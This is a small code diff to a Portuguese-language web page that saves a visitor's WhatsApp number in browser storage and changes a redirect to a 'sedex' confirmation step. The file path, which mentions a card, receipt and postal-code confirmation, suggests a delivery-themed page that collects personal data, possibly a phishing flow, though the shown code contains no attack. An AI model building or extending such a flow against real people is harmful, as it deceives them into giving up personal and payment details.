--- a/card/recebimento/cep/confirma/maneger/index.html
+++ b/card/recebimento/cep/confirma/maneger/index.html
@@ -95,7 +95,7 @@
                 localStorage.setItem('whatsapp', whatsapp); // Salva o WhatsApp no localStorage
 
                 // Redireciona para a próxima página de confirmação (AJAX pode ser adicionado se necessário)
-                window.location.href = 'sedex/index.php';
+                window.location.href = 'sedex';
             } else {
                 alert('Por favor, insira seu número de WhatsApp.');
             }
